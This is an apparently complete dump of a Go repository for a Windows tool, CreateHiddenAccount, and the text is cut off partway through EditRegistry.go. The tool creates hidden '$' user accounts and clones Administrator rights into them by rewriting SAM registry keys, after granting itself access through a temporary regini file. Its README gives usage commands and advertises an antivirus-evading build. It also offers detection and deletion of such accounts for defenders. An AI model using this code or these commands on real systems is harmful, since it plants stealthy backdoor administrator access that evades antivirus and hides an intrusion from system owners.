├── .vscode └── settings.json ├── LICENSE ├── README.md ├── README_ZH.md ├── common ├── DetermineDC.go ├── DetermineRegistryPermission.go └── flag.go ├── core ├── CheckHiddenAccounts.go ├── CreateHiddenAccount.go ├── DeleteHiddenAccount.go ├── EditRegistry.go └── Users.go ├── go.mod ├── go.sum ├── images ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png └── 6.png └── main.go /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "go.toolsEnvVars": { 3 | "GOOS": "windows" 4 | } 5 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CreateHiddenAccount 创建隐藏账号 2 | 3 | 4 | 5 | [![GitHub stars](https://img.shields.io/github/stars/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount) [![GitHub issues](https://img.shields.io/github/issues/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount/issues) [![GitHub release](https://img.shields.io/github/release/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount/releases) [![img](https://img.shields.io/badge/author-TeamsSix-blueviolet)](https://github.com/teamssix) [![img](https://img.shields.io/badge/WgpSec-%E7%8B%BC%E7%BB%84%E5%AE%89%E5%85%A8%E5%9B%A2%E9%98%9F-blue)](https://github.com/wgpsec) 6 | 7 | ![CreateHiddenAccount](https://socialify.git.ci/wgpsec/CreateHiddenAccount/image?description=1&font=Inter&forks=1&issues=1&language=1&logo=https%3A%2F%2Favatars.githubusercontent.com%2Fu%2F49087564&owner=1&pattern=Circuit%20Board&pulls=1&stargazers=1&theme=Dark) 8 | 9 | [中文](https://github.com/wgpsec/CreateHiddenAccount/blob/master/README_ZH.md) | EN 10 | 11 | # Tool Introduction 12 | 13 | There are two common ways to create a hidden account. One is to add the $ sign directly after the user name to create it, and the other is to use the registry to clone the user to create. . 14 | 15 | So I wondered if I could implement the process of cloning accounts using the registry. After searching on the Internet, I couldn't find a convenient tool, so I wrote one myself. 16 | 17 | In addition to adding hidden accounts, the tool also adds functions to check hidden accounts and delete hidden accounts, so that both the red team and the blue team can use this tool. 18 | 19 | **DISCLAIMER: DO NOT USE THE TOOL FOR ILLEGAL USE, THE DEVELOPER IS NOT RESPONSIBLE OR RESPONSIBLE FOR ANY MISUSE OR DAMAGE. ** 20 | 21 | # Download Link 22 | 23 | [https://github.com/wgpsec/CreateHiddenAccount/releases](https://github.com/wgpsec/CreateHiddenAccount/releases) 24 | 25 | - CreateHiddenAccount.exe BypassAV works better 26 | - CreateHiddenAccount_upx.exe Smaller size 27 | 28 | # Help Information 29 | 30 | Use `CreateHiddenAccount.exe -h` for help 31 | 32 | - -c Check the hidden accounts of the current system 33 | - -cu Set clone user (default "Administrator") 34 | - -d Set delete username, If the username does not end with a $ sign, a $ sign will be added automatically 35 | - -oc Only create hidden users, do not clone users by modifying the registry 36 | - -p Set password 37 | - -u Set username, If the username does not end with a $ sign, a $ sign will be added automatically 38 | - -v View version 39 | 40 | ![img](./images/1.png) 41 | 42 | # ✨ Example 43 | 44 | Add a hidden account with the user name teamssix, the tool will automatically add the $ character after the user name, so the created user name is teamssix$ 45 | 46 | When using, remember to run under administrator privileges, otherwise it will prompt insufficient privileges. 47 | 48 | ``` 49 | CreateHiddenAccount.exe -u teamssix -p Passw0rd 50 | ``` 51 | 52 | ![img](./images/2.png) 53 | 54 | Select the username you want to clone 55 | 56 | ``` 57 | CreateHiddenAccount.exe -u teamssix2 -p Passw0rd -cu test 58 | ``` 59 | 60 | ![](./images/3.png) 61 | 62 | Only create hidden users, do not modify the registry 63 | 64 | ``` 65 | CreateHiddenAccount.exe -u teamssix3 -p Passw0rd -oc 66 | ``` 67 | 68 | ![](./images/4.png) 69 | 70 | Check the hidden accounts of the current system. 71 | 72 | ``` 73 | CreateHiddenAccount.exe -c 74 | ``` 75 | 76 | ![img](./images/5.png) 77 | 78 | Delete the teamssix hidden account 79 | 80 | ``` 81 | CreateHiddenAccount.exe -d teamssix 82 | ``` 83 | 84 | ![img](./images/6.png) 85 | 86 | In the end, if there is any bug to open an issue, the Star will be gone, you know. 87 | 88 | # ⚠️ Notice 89 | 90 | - The tool requires administrator privileges to run 91 | 92 | - This tool is not guaranteed to work properly on 32-bit systems 93 | 94 | - On the domain controller machine, this tool will only add hidden users and will not modify the registry, because on the domain controller machine, user information is not stored in the registry. 95 | 96 | - If the control panel shows that there is a hidden user, but both tools and net user show that the user does not exist, then when the computer restarts, the hidden user in the control panel will disappear. 97 | 98 | - The tool will automatically add the $ character to the username without the $ character. For example, if -u specifies the user name as teamssix, the actual account added is teamssix$; if -u specifies the user name as teamssix$, then the actual added account is or teamssix$ 99 | 100 | > The purpose of this is because if the user name does not have the $ character, then hiding the user is meaningless. If you just want to add an account, just use net user directly. 101 | 102 | # Changelog 103 | 104 | ## v0.2 2021.1.18 105 | 106 | * Enhanced the ability to detect hidden accounts 107 | * Added ability to select clone user 108 | * Added the function of only creating hidden users without modifying the registry 109 | * Added tool version display 110 | 111 | ## v0.1 2021.1.17 -------------------------------------------------------------------------------- /README_ZH.md: -------------------------------------------------------------------------------- 1 |

CreateHiddenAccount 创建隐藏账号

2 | 3 | [![GitHub stars](https://img.shields.io/github/stars/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount) [![GitHub issues](https://img.shields.io/github/issues/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount/issues) [![GitHub release](https://img.shields.io/github/release/wgpsec/CreateHiddenAccount)](https://github.com/wgpsec/CreateHiddenAccount/releases) [![](https://img.shields.io/badge/author-TeamsSix-blueviolet)](https://github.com/teamssix) [![](https://img.shields.io/badge/WgpSec-%E7%8B%BC%E7%BB%84%E5%AE%89%E5%85%A8%E5%9B%A2%E9%98%9F-blue)](https://github.com/wgpsec) 4 | 5 | ![CreateHiddenAccount](https://socialify.git.ci/wgpsec/CreateHiddenAccount/image?description=1&font=Inter&forks=1&issues=1&language=1&logo=https%3A%2F%2Favatars.githubusercontent.com%2Fu%2F49087564&owner=1&pattern=Circuit%20Board&pulls=1&stargazers=1&theme=Dark) 6 | 7 | 中文 | [EN](https://github.com/wgpsec/CreateHiddenAccount/) 8 | 9 | # 工具介绍 10 | 11 | 常见的创建隐藏账号的两种方法,一种是直接在用户名后加上 $ 符进行创建,一种是利用注册表克隆用户创建,第二种方法隐藏效果更好些,但是操作要复杂不少。 12 | 13 | 于是便想着能不能把这个利用注册表克隆账号的过程工具化,在网上搜索了一番后,没有找到顺手的工具,那就自己写一个吧。 14 | 15 | 工具里除了添加隐藏账号外,还添加了检查隐藏账号、删除隐藏账号的功能,这样不管是红队还是蓝队都可以用到这款工具。 16 | 17 | **免责声明:请勿将工具用于非法用途,开发人员不承担任何责任,也不对任何滥用或损坏负责。** 18 | 19 | # 下载地址 20 | 21 | [https://github.com/wgpsec/CreateHiddenAccount/releases](https://github.com/wgpsec/CreateHiddenAccount/releases) 22 | 23 | * CreateHiddenAccount.exe 免杀效果更好 24 | * CreateHiddenAccount_upx.exe 体积更小 25 | 26 | # 帮助信息 27 | 28 | 使用 `CreateHiddenAccount.exe -h` 查看帮助信息 29 | 30 | * -c 检查当前系统的隐藏账户 31 | * -cu 设置要克隆的用户,默认 Administrator 用户 32 | * -d 指定要删除的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $ 33 | * -oc 只创建隐藏用户,不对注册表进行操作,避免被杀软拦截 34 | * -p 指定添加的用户的密码 35 | * -u 指定要添加的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $ 36 | * -v 查看当前工具版本 37 | 38 | ![](./images/1.png) 39 | 40 | # :sparkles: 示例 41 | 42 | 添加一个用户名为 teamssix 的隐藏账号,工具会自动在用户名后添加 $ 符,因此创建后的用户名为 teamssix$ 43 | 44 | 使用的时候,记得在管理员权限下运行,不然会提示权限不足 45 | 46 | ``` 47 | CreateHiddenAccount.exe -u teamssix -p Passw0rd 48 | ``` 49 | 50 | ![](./images/2.png) 51 | 52 | 指定要克隆的用户名 53 | 54 | ``` 55 | CreateHiddenAccount.exe -u teamssix2 -p Passw0rd -cu test 56 | ``` 57 | 58 | ![](./images/3.png) 59 | 60 | 只创建隐藏用户,不修改注册表 61 | 62 | ``` 63 | CreateHiddenAccount.exe -u teamssix3 -p Passw0rd -oc 64 | ``` 65 | 66 | ![](./images/4.png) 67 | 68 | 检查当前系统的隐藏账号 69 | 70 | ``` 71 | CreateHiddenAccount.exe -c 72 | ``` 73 | 74 | ![](./images/5.png) 75 | 76 | 删除 teamssix 隐藏账号 77 | 78 | ``` 79 | CreateHiddenAccount.exe -d teamssix 80 | ``` 81 | 82 | ![](./images/6.png) 83 | 84 | 最后,如果有什么 bug 可以提 issue, Star 就不要了,你懂的。 85 | 86 | # ⚠️ 注意事项 87 | 88 | * 该工具需要管理员权限才能运行 89 | 90 | * 该工具不能保证在 32 位系统下的正常运行 91 | 92 | * 在域控机器上,该工具只会添加隐藏用户,不会修改注册表,因为在域控的机器上,用户信息不保存在注册表里。 93 | 94 | * 如果控制面板里显示存在隐藏用户,但是工具和 net user 都显示不存在这个用户,那么当电脑重启后,控制面板里的这个隐藏用户就会消失 95 | 96 | * 该工具会自动为没有 $ 符的用户名添加上 $ 符,比如 -u 指定用户名为 teamssix,实际上添加的账号是 teamssix$;如果 -u 指定用户名为 teamssix$,那么实际上添加的账号还是 teamssix$ 97 | 98 | > 这样做的目的是因为如果用户名没有 $ 符,那么隐藏用户就失去了意义,如果只是想添加个账号,那直接使用 net user 就行。 99 | 100 | # 更新记录 101 | 102 | ## v0.2 2021.1.18 103 | 104 | * 增强了隐藏账号检测能力 105 | * 增加了指定克隆用户的功能 106 | * 增加了只创建隐藏用户,不修改注册表的功能 107 | * 增加了工具版本显示 108 | 109 | ## v0.1 2021.1.17 110 | -------------------------------------------------------------------------------- /common/DetermineDC.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package common 6 | 7 | import ( 8 | "io/ioutil" 9 | "os" 10 | "os/exec" 11 | "strings" 12 | ) 13 | 14 | func DetermineDC() bool { 15 | hostname, _ := os.Hostname() 16 | hostname = strings.ToUpper(hostname) 17 | cmd := exec.Command("netdom", "query", "pdc") 18 | stdout, _ := cmd.StdoutPipe() 19 | defer stdout.Close() 20 | err := cmd.Start() 21 | if err != nil { 22 | return false 23 | } else { 24 | opBytes, _ := ioutil.ReadAll(stdout) 25 | dcname := strings.Split(string(opBytes), "\n")[2] 26 | if hostname == dcname { 27 | return true 28 | } else { 29 | return false 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /common/DetermineRegistryPermission.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package common 6 | 7 | import ( 8 | "fmt" 9 | registry "golang.org/x/sys/windows/registry" 10 | "io/ioutil" 11 | "os" 12 | "os/exec" 13 | ) 14 | 15 | func DetermineRegistryPermissions(path string) { 16 | if !DetermineSAMRegistryPermissions(path) { 17 | fmt.Printf("[!] Access to %s registration denied\n", path) 18 | fmt.Println("[!] Adding registry permissions.") 19 | RegSetIni := "HKEY_LOCAL_MACHINE\\" + path + " [1 17]" 20 | ioutil.WriteFile(".N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini", []byte(RegSetIni), 0644) 21 | cmd := exec.Command("regini", ".N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini") 22 | err := cmd.Run() 23 | if err != nil { 24 | os.Remove(".N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini") 25 | } 26 | os.Remove(".N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini") 27 | if DetermineSAMRegistryPermissions(path) { 28 | fmt.Println("[+] Added registry permissions successfully.") 29 | } else { 30 | fmt.Println("[-] Failed to add registry permissions, Please confirm whether you have administrator privileges.") 31 | os.Exit(3) 32 | } 33 | } 34 | } 35 | 36 | func DetermineSAMRegistryPermissions(path string) bool { 37 | _, err := registry.OpenKey(registry.LOCAL_MACHINE, path, registry.ALL_ACCESS) 38 | if err != nil { 39 | if err.Error() == "Access is denied." { 40 | return false 41 | } else { 42 | fmt.Println("[-] Registry Path: " + path) 43 | fmt.Printf("[-] DetermineSAMRegistryPermissions ERR: %s\n", err) 44 | return false 45 | } 46 | } else { 47 | return true 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /common/flag.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package common 6 | 7 | import ( 8 | "flag" 9 | "fmt" 10 | "os" 11 | "strings" 12 | ) 13 | 14 | func Flag() (string, string, string, string, bool, bool) { 15 | logo() 16 | var username string 17 | var password string 18 | var cloneuser string 19 | var deleteusername string 20 | var check bool 21 | var onlycreate bool 22 | var version bool 23 | flag.StringVar(&username, "u", "", "Set username, If the username does not end with a $ sign, a $ sign will be added automatically") 24 | flag.StringVar(&password, "p", "", "Set password") 25 | flag.StringVar(&deleteusername, "d", "", "Set delete username, If the username does not end with a $ sign, a $ sign will be added automatically") 26 | flag.BoolVar(&check, "c", false, "Check the hidden accounts of the current system") 27 | flag.StringVar(&cloneuser, "cu", "Administrator", "Set clone user") 28 | flag.BoolVar(&onlycreate, "oc", false, "Only create hidden users, do not clone users by modifying the registry") 29 | flag.BoolVar(&version, "v", false, "View version") 30 | flag.Parse() 31 | 32 | CheckUserName(username) 33 | CheckUserName(deleteusername) 34 | CheckUserName(cloneuser) 35 | if version { 36 | fmt.Println("[+] Current Version: v0.2") 37 | os.Exit(3) 38 | } 39 | if check { 40 | return "", "", "", "", false, check 41 | } else if username == "" && password == "" && deleteusername == "" { 42 | flag.Usage() 43 | os.Exit(3) 44 | } else if username == "" && deleteusername == "" { 45 | fmt.Println("[-] Username cannot be empty. Enter -h to view the help information") 46 | os.Exit(3) 47 | } else if password == "" && deleteusername == "" { 48 | fmt.Println("[-] Password cannot be empty. Enter -h to view the help information") 49 | os.Exit(3) 50 | } 51 | if username != "" { 52 | if string(string(username[len(username)-1:len(username)])) != "$" { 53 | username = username + "$" 54 | } 55 | } 56 | if deleteusername != "" { 57 | if string(deleteusername[len(deleteusername)-1:len(deleteusername)]) != "$" { 58 | deleteusername = deleteusername + "$" 59 | } 60 | } 61 | 62 | return username, password, deleteusername, cloneuser, onlycreate, check 63 | } 64 | 65 | func CheckUserName(username string) { 66 | WhiteList := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$_" 67 | k := 0 68 | for _, i := range strings.Split(WhiteList, "") { 69 | for _, j := range strings.Split(username, "") { 70 | if j == i { 71 | k++ 72 | } 73 | } 74 | } 75 | if k != len(strings.Split(username, "")) { 76 | fmt.Println("[-] Invalid user name.") 77 | os.Exit(3) 78 | } 79 | } 80 | 81 | func logo() { 82 | fmt.Println(` 83 | ╔═╗┬─┐┌─┐┌─┐┌┬┐┌─┐ ╦ ╦┬┌┬┐┌┬┐┌─┐┌┐┌ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌┐┌┌┬┐ 84 | ║ ├┬┘├┤ ├─┤ │ ├┤ ╠═╣│ ││ ││├┤ │││ ╠═╣│ │ │ ││ ││││ │ 85 | ╚═╝┴└─└─┘┴ ┴ ┴ └─┘ ╩ ╩┴─┴┘─┴┘└─┘┘└┘ ╩ ╩└─┘└─┘└─┘└─┘┘└┘ ┴ v0.2 86 | Team: WgpSec 87 | Author: TeamsSix 88 | Blog: teamssix.com 89 | WeChat Official Accounts: TeamsSix 90 | Project Address: github.com/wgpsec/CreateHiddenAccount 91 | `) 92 | fmt.Println("[!] 请勿将工具用于非法用途,开发人员不承担任何责任,也不对任何滥用或损坏负责。") 93 | fmt.Println("[!] Do not use the tool for illegal purposes, the developer is not responsible, nor responsible for any misuse or damage.\n") 94 | } 95 | -------------------------------------------------------------------------------- /core/CheckHiddenAccounts.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package core 6 | 7 | import ( 8 | "wgpsec.org/createHiddenAccount/common" 9 | "fmt" 10 | registry "golang.org/x/sys/windows/registry" 11 | "strings" 12 | ) 13 | 14 | func CheckHiddenAccounts() { 15 | HiddenAccounts := CheckHiddenAccountsSub() 16 | if len(HiddenAccounts) > 1 { 17 | fmt.Println("[+] Found Hidden Account: ") 18 | for _, j := range HiddenAccounts { 19 | fmt.Println(j) 20 | } 21 | } else if len(HiddenAccounts) == 1 { 22 | fmt.Println("[+] Found Hidden Account: ", HiddenAccounts[0]) 23 | } else { 24 | fmt.Println("[!] Not Found Hidden Account.") 25 | } 26 | } 27 | 28 | func CheckHiddenAccountsSub() []string { 29 | var HiddenAccounts []string 30 | usernames, _ := ListLocalUsers() 31 | for _, i := range usernames { 32 | if strings.Contains(i.Username, "$") { 33 | HiddenAccounts = append(HiddenAccounts, i.Username) 34 | } 35 | } 36 | if !common.DetermineDC() { 37 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users\\Names") 38 | key, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names", registry.ALL_ACCESS) 39 | defer key.Close() 40 | v, _ := key.ReadSubKeyNames(0) 41 | for _, j := range v { 42 | if strings.Contains(j, "$") { 43 | n := 0 44 | for _, k := range HiddenAccounts { 45 | if k == j { 46 | n++ 47 | } 48 | } 49 | if n == 0 { 50 | HiddenAccounts = append(HiddenAccounts, j) 51 | } 52 | } 53 | } 54 | } 55 | return HiddenAccounts 56 | } 57 | -------------------------------------------------------------------------------- /core/CreateHiddenAccount.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package core 6 | 7 | import ( 8 | "wgpsec.org/createHiddenAccount/common" 9 | ) 10 | 11 | func CreateHiddenAccount(username, password, cloneuser string, onlycreate bool) { 12 | if common.DetermineDC() { 13 | UserAdd(username, password) 14 | } else { 15 | if onlycreate { 16 | UserAdd(username, password) 17 | } else { 18 | UserAdd(username, password) 19 | EditRegistry(username, cloneuser) 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /core/DeleteHiddenAccount.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package core 6 | 7 | import ( 8 | "wgpsec.org/createHiddenAccount/common" 9 | "fmt" 10 | registry "golang.org/x/sys/windows/registry" 11 | "strconv" 12 | "strings" 13 | "syscall" 14 | "unsafe" 15 | ) 16 | 17 | func DeleteHiddenAccount(username string) { 18 | if !DetermineUserExists(username) { 19 | fmt.Printf("[-] Not Found %s User.\n", username) 20 | } else { 21 | ret := DeleteWindowsApiUser(username) 22 | if ret != NET_API_STATUS_NERR_Success { 23 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users\\Names\\" + username) 24 | DeleteHiddenAccountRegistry(username) 25 | if !DetermineUserExists(username) { 26 | fmt.Printf("[+] Succeeded to delete %s user using registry.\n", username) 27 | } else { 28 | fmt.Printf("[-] Failed to delete %s user.\n", username) 29 | } 30 | } else { 31 | fmt.Printf("[+] Succeeded to Delete %s user using windows api.\n", username) 32 | } 33 | } 34 | } 35 | 36 | func DeleteWindowsApiUser(username string) uintptr { 37 | uPointer, err := syscall.UTF16PtrFromString(username) 38 | if err != nil { 39 | fmt.Printf("[-] Failed to Delete %s User, Unable to encode username to UTF16.\n", username) 40 | } 41 | ret, _, _ := usrNetUserDel.Call( 42 | uintptr(0), 43 | uintptr(unsafe.Pointer(uPointer)), 44 | ) 45 | return ret 46 | } 47 | 48 | func DeleteHiddenAccountRegistry(username string) { 49 | NamesUserNamePath := "SAM\\SAM\\Domains\\Account\\Users\\Names\\" + username 50 | _, UserNameIntRID := GetRegistryValue(NamesUserNamePath, "") 51 | UserNameHexRID := "00000" + strconv.FormatUint(uint64(UserNameIntRID), 16) 52 | UsersUserNamePath := "SAM\\SAM\\Domains\\Account\\Users\\" + strings.ToUpper(UserNameHexRID) 53 | err := registry.DeleteKey(registry.LOCAL_MACHINE, UsersUserNamePath) 54 | if err != nil { 55 | fmt.Printf("[-] %s\n", err) 56 | } 57 | err = registry.DeleteKey(registry.LOCAL_MACHINE, NamesUserNamePath) 58 | } 59 | 60 | func DetermineUserExists(username string) bool { 61 | HiddenAccounts := CheckHiddenAccountsSub() 62 | if len(HiddenAccounts) == 0 { 63 | return false 64 | } else { 65 | for _, i := range HiddenAccounts { 66 | if username == i { 67 | return true 68 | } 69 | } 70 | } 71 | return false 72 | } 73 | -------------------------------------------------------------------------------- /core/EditRegistry.go: -------------------------------------------------------------------------------- 1 | // Author : TeamsSix 2 | // Blog : teamssix.com 3 | // WeChat Official Accounts: TeamsSix 4 | 5 | package core 6 | 7 | import ( 8 | "wgpsec.org/createHiddenAccount/common" 9 | "fmt" 10 | registry "golang.org/x/sys/windows/registry" 11 | "io/ioutil" 12 | "log" 13 | "os" 14 | "os/exec" 15 | "strconv" 16 | "strings" 17 | ) 18 | 19 | type UserRegistry struct { 20 | F []byte 21 | ForcePasswordReset []byte 22 | SupplementalCredentials []byte 23 | V []byte 24 | } 25 | 26 | func EditRegistry(username, cloneuser string) { 27 | t := 0 28 | systemname, _ := ListLocalUsers() 29 | for _, i := range systemname { 30 | if i.Username == cloneuser { 31 | t++ 32 | } 33 | } 34 | if t == 0 { 